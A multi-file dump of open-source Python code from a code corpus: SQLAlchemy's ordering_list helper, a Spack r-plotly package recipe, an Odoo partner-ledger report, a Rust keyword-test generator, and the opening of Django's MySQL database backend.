from sqlalchemy.ext.orderinglist import ordering_list
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
:param attr:
Name of the mapped attribute to use for storage and retrieval of
ordering information
:param count_from:
Set up an integer-based ordering, starting at ``count_from``. For
example, ``ordering_list('pos', count_from=1)`` would create a 1-based
list in SQL, storing the value in the 'pos' column. Ignored if
``ordering_func`` is supplied.
Additional arguments are passed to the :class:`.OrderingList` constructor.
"""
kw = _unsugar_count_from(count_from=count_from, **kw)
return lambda: OrderingList(attr, **kw)
# Ordering utility functions
def count_from_0(index, collection):
"""Numbering function: consecutive integers starting at 0."""
return index
def count_from_1(index, collection):
"""Numbering function: consecutive integers starting at 1."""
return index + 1
def count_from_n_factory(start):
"""Numbering function: consecutive integers starting at arbitrary start."""
def f(index, collection):
return index + start
try:
f.__name__ = "count_from_%i" % start
except TypeError:
pass
return f
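# For example (illustrative), count_from_n_factory(5) returns a numbering
# function mapping list index 0 -> 5, index 1 -> 6, and so on.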
def _unsugar_count_from(**kw):
"""Builds counting functions from keyword arguments.
Keyword argument filter, prepares a simple ``ordering_func`` from a
``count_from`` argument, otherwise passes ``ordering_func`` on unchanged.
"""
count_from = kw.pop("count_from", None)
if kw.get("ordering_func", None) is None and count_from is not None:
if count_from == 0:
kw["ordering_func"] = count_from_0
elif count_from == 1:
kw["ordering_func"] = count_from_1
else:
kw["ordering_func"] = count_from_n_factory(count_from)
return kw
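# A sketch of the translation performed above (illustrative):
#   _unsugar_count_from(count_from=0) -> {'ordering_func': count_from_0}
#   _unsugar_count_from(count_from=1) -> {'ordering_func': count_from_1}
#   _unsugar_count_from(count_from=7) -> {'ordering_func': count_from_7}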
class OrderingList(list):
"""A custom list that manages position information for its children.
The :class:`.OrderingList` object is normally set up using the
:func:`.ordering_list` factory function, used in conjunction with
the :func:`_orm.relationship` function.
"""
def __init__(
self, ordering_attr=None, ordering_func=None, reorder_on_append=False
):
"""A custom list that manages position information for its children.
``OrderingList`` is a ``collection_class`` list implementation that
syncs position in a Python list with a position attribute on the
mapped objects.
This implementation relies on the list starting in the proper order,
so be **sure** to put an ``order_by`` on your relationship.
:param ordering_attr:
Name of the attribute that stores the object's order in the
relationship.
:param ordering_func: Optional. A function that maps the position in
the Python list to a value to store in the
``ordering_attr``. Values returned are usually (but need not be!)
integers.
An ``ordering_func`` is called with two positional parameters: the
index of the element in the list, and the list itself.
If omitted, Python list indexes are used for the attribute values.
Two basic pre-built numbering functions are provided in this module:
``count_from_0`` and ``count_from_1``. For more exotic examples
like stepped numbering, alphabetical and Fibonacci numbering, see
the unit tests.
:param reorder_on_append:
Default False. When appending an object with an existing (non-None)
ordering value, that value will be left untouched unless
``reorder_on_append`` is true. This is an optimization to avoid a
variety of dangerous unexpected database writes.
SQLAlchemy will add instances to the list via append() when your
object loads. If for some reason the result set from the database
skips a step in the ordering (say, row '1' is missing but you get
'2', '3', and '4'), reorder_on_append=True would immediately
renumber the items to '1', '2', '3'. If you have multiple sessions
making changes, any of whom happen to load this collection even in
passing, all of the sessions would try to "clean up" the numbering
in their commits, possibly causing all but one to fail with a
concurrent modification error.
Recommend leaving this with the default of False, and just call
``reorder()`` if you're doing ``append()`` operations with
previously ordered instances or when doing some housekeeping after
manual sql operations.
"""
self.ordering_attr = ordering_attr
if ordering_func is None:
ordering_func = count_from_0
self.ordering_func = ordering_func
self.reorder_on_append = reorder_on_append
# More complex serialization schemes (multi column, e.g.) are possible by
# subclassing and reimplementing these two methods.
def _get_order_value(self, entity):
return getattr(entity, self.ordering_attr)
def _set_order_value(self, entity, value):
setattr(entity, self.ordering_attr, value)
def reorder(self):
"""Synchronize ordering for the entire collection.
Sweeps through the list and ensures that each object has accurate
ordering information set.
"""
for index, entity in enumerate(self):
self._order_entity(index, entity, True)
# As of 0.5, _reorder is no longer semi-private
_reorder = reorder
def _order_entity(self, index, entity, reorder=True):
have = self._get_order_value(entity)
# Don't disturb existing ordering if reorder is False
if have is not None and not reorder:
return
should_be = self.ordering_func(index, self)
if have != should_be:
self._set_order_value(entity, should_be)
def append(self, entity):
super(OrderingList, self).append(entity)
self._order_entity(len(self) - 1, entity, self.reorder_on_append)
def _raw_append(self, entity):
"""Append without any ordering behavior."""
super(OrderingList, self).append(entity)
_raw_append = collection.adds(1)(_raw_append)
def insert(self, index, entity):
super(OrderingList, self).insert(index, entity)
self._reorder()
def remove(self, entity):
super(OrderingList, self).remove(entity)
adapter = collection_adapter(self)
if adapter and adapter._referenced_by_owner:
self._reorder()
def pop(self, index=-1):
entity = super(OrderingList, self).pop(index)
self._reorder()
return entity
def __setitem__(self, index, entity):
if isinstance(index, slice):
step = index.step or 1
start = index.start or 0
if start < 0:
start += len(self)
stop = index.stop or len(self)
if stop < 0:
stop += len(self)
for i in range(start, stop, step):
self.__setitem__(i, entity[i])
else:
self._order_entity(index, entity, True)
super(OrderingList, self).__setitem__(index, entity)
def __delitem__(self, index):
super(OrderingList, self).__delitem__(index)
self._reorder()
def __setslice__(self, start, end, values):
super(OrderingList, self).__setslice__(start, end, values)
self._reorder()
def __delslice__(self, start, end):
super(OrderingList, self).__delslice__(start, end)
self._reorder()
def __reduce__(self):
return _reconstitute, (self.__class__, self.__dict__, list(self))
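    # Copy docstrings from the corresponding built-in list methods onto the
    # overridden methods above that do not define their own.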
for func_name, func in list(locals().items()):
if (
callable(func)
and func.__name__ == func_name
and not func.__doc__
and hasattr(list, func_name)
):
func.__doc__ = getattr(list, func_name).__doc__
del func_name, func
def _reconstitute(cls, dict_, items):
"""Reconstitute an :class:`.OrderingList`.
This is the adjoint to :meth:`.OrderingList.__reduce__`. It is used for
unpickling :class:`.OrderingList` objects.
"""
obj = cls.__new__(cls)
obj.__dict__.update(dict_)
list.extend(obj, items)
return obj
| mit |
mfherbst/spack | var/spack/repos/builtin/packages/r-plotly/package.py | 5 | 2533 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RPlotly(RPackage):
"""Easily translate 'ggplot2' graphs to an interactive web-based version
and/or create custom web-based visualizations directly from R."""
homepage = "https://cran.r-project.org/web/packages/plotly/index.html"
url = "https://cran.r-project.org/src/contrib/plotly_4.7.1.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/plotly"
version('4.7.1', '4799c8b429291d4c52fb904380806548')
version('4.7.0', '5bd52d515c01af7ff291c30a6cf23bec')
version('4.6.0', '27ff3de288bacfaad6e6694752ea2929')
version('4.5.6', 'e6e00177fa64dc6b1a199facfd73f585')
version('4.5.2', '7eb11b24a9faa9a572657fd89ed72fa5')
depends_on('[email protected]:3.4.9')
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-httr', type=('build', 'run'))
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-tidyr', type=('build', 'run'))
depends_on('r-dplyr', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-data-table', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r-purrr', type=('build', 'run'))
depends_on('r-crosstalk', type=('build', 'run'))
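    # Typical usage with the standard Spack CLI (illustrative):
    #   spack install r-plotly          # latest known version
    #   spack install [email protected]    # pinned version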
| lgpl-2.1 |
dllsf/odootest | addons/account/report/account_partner_ledger.py | 81 | 13063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.report import report_sxw
from common_report_header import common_report_header
class third_party_ledger(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context=None):
super(third_party_ledger, self).__init__(cr, uid, name, context=context)
self.init_bal_sum = 0.0
self.localcontext.update({
'time': time,
'lines': self.lines,
'sum_debit_partner': self._sum_debit_partner,
'sum_credit_partner': self._sum_credit_partner,
'get_currency': self._get_currency,
'get_start_period': self.get_start_period,
'get_end_period': self.get_end_period,
'get_account': self._get_account,
'get_filter': self._get_filter,
'get_start_date': self._get_start_date,
'get_end_date': self._get_end_date,
'get_fiscalyear': self._get_fiscalyear,
'get_journal': self._get_journal,
'get_partners':self._get_partners,
'get_intial_balance':self._get_intial_balance,
'display_initial_balance':self._display_initial_balance,
'display_currency':self._display_currency,
'get_target_move': self._get_target_move,
})
def _get_filter(self, data):
if data['form']['filter'] == 'unreconciled':
return _('Unreconciled Entries')
return super(third_party_ledger, self)._get_filter(data)
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
obj_partner = self.pool.get('res.partner')
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {}))
ctx2 = data['form'].get('used_context',{}).copy()
self.initial_balance = data['form'].get('initial_balance', True)
if self.initial_balance:
ctx2.update({'initial_bal': True})
self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)
self.reconcil = True
if data['form']['filter'] == 'unreconciled':
self.reconcil = False
self.result_selection = data['form'].get('result_selection', 'customer')
self.amount_currency = data['form'].get('amount_currency', False)
self.target_move = data['form'].get('target_move', 'all')
PARTNER_REQUEST = ''
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.result_selection == 'supplier':
self.ACCOUNT_TYPE = ['payable']
elif self.result_selection == 'customer':
self.ACCOUNT_TYPE = ['receivable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
self.cr.execute(
"SELECT a.id " \
"FROM account_account a " \
"LEFT JOIN account_account_type t " \
"ON (a.type=t.code) " \
            'WHERE a.type IN %s ' \
"AND a.active", (tuple(self.ACCOUNT_TYPE), ))
self.account_ids = [a for (a,) in self.cr.fetchall()]
params = [tuple(move_state), tuple(self.account_ids)]
#if we print from the partners, add a clause on active_ids
if (data['model'] == 'res.partner') and ids:
PARTNER_REQUEST = "AND l.partner_id IN %s"
params += [tuple(ids)]
self.cr.execute(
"SELECT DISTINCT l.partner_id " \
"FROM account_move_line AS l, account_account AS account, " \
" account_move AS am " \
"WHERE l.partner_id IS NOT NULL " \
"AND l.account_id = account.id " \
"AND am.id = l.move_id " \
"AND am.state IN %s"
# "AND " + self.query +" " \
"AND l.account_id IN %s " \
" " + PARTNER_REQUEST + " " \
"AND account.active ", params)
self.partner_ids = [res['partner_id'] for res in self.cr.dictfetchall()]
objects = obj_partner.browse(self.cr, self.uid, self.partner_ids)
return super(third_party_ledger, self).set_context(objects, data, self.partner_ids, report_type)
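    # Flow sketch: set_context() resolves the payable/receivable account ids,
    # collects the distinct partners holding move lines on them, and hands the
    # browsed partners to the report engine; lines() and the _sum_* helpers
    # below then run once per partner during rendering.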
def lines(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
full_account = []
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT l.id, l.date, j.code, acc.code as a_code, acc.name as a_name, l.ref, m.name as move_name, l.name, l.debit, l.credit, l.amount_currency,l.currency_id, c.symbol AS currency_code " \
"FROM account_move_line l " \
"LEFT JOIN account_journal j " \
"ON (l.journal_id = j.id) " \
"LEFT JOIN account_account acc " \
"ON (l.account_id = acc.id) " \
"LEFT JOIN res_currency c ON (l.currency_id=c.id)" \
"LEFT JOIN account_move m ON (m.id=l.move_id)" \
"WHERE l.partner_id = %s " \
"AND l.account_id IN %s AND " + self.query +" " \
"AND m.state IN %s " \
" " + RECONCILE_TAG + " "\
"ORDER BY l.date",
(partner.id, tuple(self.account_ids), tuple(move_state)))
res = self.cr.dictfetchall()
sum = 0.0
if self.initial_balance:
sum = self.init_bal_sum
for r in res:
sum += r['debit'] - r['credit']
r['progress'] = sum
full_account.append(r)
return full_account
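    # Each dict returned by lines() carries the selected SQL columns plus a
    # running balance, e.g. (illustrative values):
    #   {'date': '2014-01-31', 'move_name': 'SAJ/2014/001', 'debit': 100.0,
    #    'credit': 0.0, 'progress': 100.0, ...}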
def _get_intial_balance(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT COALESCE(SUM(l.debit),0.0), COALESCE(SUM(l.credit),0.0), COALESCE(sum(debit-credit), 0.0) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " "\
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
res = self.cr.fetchall()
self.init_bal_sum = res[0][2]
return res
def _sum_debit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _sum_credit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id=%s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _get_partners(self):
# TODO: deprecated, to remove in trunk
if self.result_selection == 'customer':
return _('Receivable Accounts')
elif self.result_selection == 'supplier':
return _('Payable Accounts')
elif self.result_selection == 'customer_supplier':
return _('Receivable and Payable Accounts')
return ''
def _sum_currency_amount_account(self, account, form):
self._set_get_account_currency_code(account.id)
self.cr.execute("SELECT sum(aml.amount_currency) FROM account_move_line as aml,res_currency as rc WHERE aml.currency_id = rc.id AND aml.account_id= %s ", (account.id,))
total = self.cr.fetchone()
if self.account_currency:
return_field = str(total[0]) + self.account_currency
return return_field
else:
currency_total = self.tot_currency = 0.0
return currency_total
def _display_initial_balance(self, data):
if self.initial_balance:
return True
return False
def _display_currency(self, data):
if self.amount_currency:
return True
return False
class report_partnerledger(osv.AbstractModel):
_name = 'report.account.report_partnerledger'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledger'
_wrapped_report_class = third_party_ledger
class report_partnerledgerother(osv.AbstractModel):
_name = 'report.account.report_partnerledgerother'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledgerother'
_wrapped_report_class = third_party_ledger
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
avdi/rust | src/etc/generate-keyword-tests.py | 53 | 1985 | #!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script takes a list of keywords and, for every keyword, generates a
test case that checks that using the keyword as an identifier fails. The
generated test files are set read-only.
Test for https://github.com/rust-lang/rust/issues/2275
sample usage: src/etc/generate-keyword-tests.py as break
"""
import sys
import os
import datetime
import stat
template = """// Copyright %d The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-tests.py %s'
fn main() {
let %s = "foo"; //~ error: ident
}
"""
test_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail')
)
for kw in sys.argv[1:]:
test_file = os.path.join(test_dir, 'keyword-%s-as-identifier.rs' % kw)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(template % (datetime.datetime.now().year, kw, kw))
# mark file read-only
os.chmod(test_file, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
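# Illustrative note (assumption, not part of the original script): running
# `generate-keyword-tests.py break` writes a read-only file named
# keyword-break-as-identifier.rs whose body ends with:
#
#   fn main() {
#       let break = "foo"; //~ error: ident
#   }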
| apache-2.0 |
hungtt57/matchmaker | lib/python2.7/site-packages/django/db/backends/mysql/base.py | 103 | 15969 | """
MySQL database backend for Django.
Requires mysqlclient: https://pypi.python.org/pypi/mysqlclient/
MySQLdb is supported for Python 2 only: http://sourceforge.net/projects/mysql-python
"""
from __future__ import unicode_literals
import datetime
import re
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.utils import six, timezone
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes, SafeText
try:
import MySQLdb as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading MySQLdb module: %s" % e)
from MySQLdb.constants import CLIENT, FIELD_TYPE # isort:skip
from MySQLdb.converters import Thing2Literal, conversions # isort:skip
# Some of these import MySQLdb, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .validation import DatabaseValidation # isort:skip
# We want version (1, 2, 1, 'final', 2) or later. We can't just use
# lexicographic ordering in this check because then (1, 2, 1, 'gamma')
# inadvertently passes the version test.
version = Database.version_info
if (version < (1, 2, 1) or (version[:3] == (1, 2, 1) and
(len(version) < 5 or version[3] != 'final' or version[4] < 2))):
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("MySQLdb-1.2.1p2 or newer is required; you have %s" % Database.__version__)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
# It's impossible to import datetime_or_None directly from MySQLdb.times
parse_datetime = conversions[FIELD_TYPE.DATETIME]
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
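# Sketch of the behaviour above (illustrative, assuming USE_TZ = True): a
# naive '2015-01-01 12:00:00' coming back from MySQL is returned as
# datetime.datetime(2015, 1, 1, 12, 0, tzinfo=<UTC>).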
def adapt_datetime_with_timezone_support(value, conv):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("MySQL received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return Thing2Literal(value.strftime("%Y-%m-%d %H:%M:%S.%f"), conv)
# MySQLdb-1.2.1 returns TIME columns as timedelta -- they are more like
# timedelta in terms of actual behavior as they are signed and include days --
# and Django expects time, so we still need to override that. We also need to
# add special handling for SafeText and SafeBytes as MySQLdb's type
# checking is too tight to catch those (see Django ticket #6052).
# Finally, MySQLdb always returns naive datetime objects. However, when
# timezone support is active, Django expects timezone-aware datetime objects.
django_conversions = conversions.copy()
django_conversions.update({
FIELD_TYPE.TIME: backend_utils.typecast_time,
FIELD_TYPE.DECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.NEWDECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.DATETIME: parse_datetime_with_timezone_support,
datetime.datetime: adapt_datetime_with_timezone_support,
})
# This should match the numerical portion of the version numbers (we can treat
# versions like 5.0.24 and 5.0.24a as the same). Based on the list of versions
# at http://dev.mysql.com/doc/refman/4.1/en/news.html and
# http://dev.mysql.com/doc/refman/5.0/en/news.html .
server_version_re = re.compile(r'(\d{1,2})\.(\d{1,2})\.(\d{1,2})')
# MySQLdb-1.2.1 and newer automatically makes use of SHOW WARNINGS on
# MySQL-4.1 and newer, so the MysqlDebugWrapper is unnecessary. Since the
# point is to raise Warnings as exceptions, this can be done with the Python
# warnings module; it is set up when the connection is created, and the
# standard backend_utils.CursorDebugWrapper can be used. Also, using sql_mode
# TRADITIONAL will automatically cause most warnings to be treated as errors.
class CursorWrapper(object):
"""
A thin wrapper around MySQLdb's normal cursor class so that we can catch
particular exception instances and reraise them with the right types.
Implemented as a wrapper, rather than a subclass, so that we aren't stuck
to the particular underlying representation returned by Connection.cursor().
"""
codes_for_integrityerror = (1048,)
def __init__(self, cursor):
self.cursor = cursor
def execute(self, query, args=None):
try:
# args is None means no string interpolation
return self.cursor.execute(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, args):
try:
return self.cursor.executemany(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return iter(self.cursor)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
        # Ticket #17671 - Close instead of passing through to avoid
        # backend-specific behavior.
self.close()
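# Minimal usage sketch for the wrapper above (illustrative, assuming an open
# MySQLdb connection `conn`):
#
#   with CursorWrapper(conn.cursor()) as cursor:
#       cursor.execute("SELECT %s", (1,))
#       row = cursor.fetchone()   # delegated via __getattr__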
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'mysql'
# This dictionary maps Field objects to their associated MySQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
_data_types = {
'AutoField': 'integer AUTO_INCREMENT',
'BinaryField': 'longblob',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'bigint',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'char(15)',
'GenericIPAddressField': 'char(39)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer UNSIGNED',
'PositiveSmallIntegerField': 'smallint UNSIGNED',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'longtext',
'TimeField': 'time',
'UUIDField': 'char(32)',
}
@cached_property
def data_types(self):
if self.features.supports_microsecond_precision:
return dict(self._data_types, DateTimeField='datetime(6)', TimeField='time(6)')
else:
return self._data_types
operators = {
'exact': '= %s',
'iexact': 'LIKE %s',
'contains': 'LIKE BINARY %s',
'icontains': 'LIKE %s',
'regex': 'REGEXP BINARY %s',
'iregex': 'REGEXP %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE BINARY %s',
'endswith': 'LIKE BINARY %s',
'istartswith': 'LIKE %s',
'iendswith': 'LIKE %s',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
    # In those cases, special characters for LIKE operators (e.g. \, %, _)
    # should be escaped on the database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\%%'), '_', '\_')"
pattern_ops = {
'contains': "LIKE BINARY CONCAT('%%', {}, '%%')",
'icontains': "LIKE CONCAT('%%', {}, '%%')",
'startswith': "LIKE BINARY CONCAT({}, '%%')",
'istartswith': "LIKE CONCAT({}, '%%')",
'endswith': "LIKE BINARY CONCAT('%%', {})",
'iendswith': "LIKE CONCAT('%%', {})",
}
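    # For example (illustrative, not in the original source), formatting the
    # 'contains' pattern with an already-escaped expression placeholder:
    #
    #   pattern_ops['contains'].format("ESC")
    #   # -> "LIKE BINARY CONCAT('%%', ESC, '%%')"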
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = DatabaseValidation(self)
def get_connection_params(self):
kwargs = {
'conv': django_conversions,
'charset': 'utf8',
}
if six.PY2:
kwargs['use_unicode'] = True
settings_dict = self.settings_dict
if settings_dict['USER']:
kwargs['user'] = settings_dict['USER']
if settings_dict['NAME']:
kwargs['db'] = settings_dict['NAME']
if settings_dict['PASSWORD']:
kwargs['passwd'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST'].startswith('/'):
kwargs['unix_socket'] = settings_dict['HOST']
elif settings_dict['HOST']:
kwargs['host'] = settings_dict['HOST']
if settings_dict['PORT']:
kwargs['port'] = int(settings_dict['PORT'])
# We need the number of potentially affected rows after an
# "UPDATE", not the number of changed rows.
kwargs['client_flag'] = CLIENT.FOUND_ROWS
kwargs.update(settings_dict['OPTIONS'])
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.encoders[SafeText] = conn.encoders[six.text_type]
conn.encoders[SafeBytes] = conn.encoders[bytes]
return conn
def init_connection_state(self):
with self.cursor() as cursor:
# SQL_AUTO_IS_NULL in MySQL controls whether an AUTO_INCREMENT column
# on a recently-inserted row will return when the field is tested for
# NULL. Disabling this value brings this aspect of MySQL in line with
# SQL standards.
cursor.execute('SET SQL_AUTO_IS_NULL = 0')
def create_cursor(self):
cursor = self.connection.cursor()
return CursorWrapper(cursor)
def _rollback(self):
try:
BaseDatabaseWrapper._rollback(self)
except Database.NotSupportedError:
pass
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit(autocommit)
def disable_constraint_checking(self):
"""
        Disables foreign key checks, primarily for use in adding rows with
        forward references. Always returns True to indicate that constraint
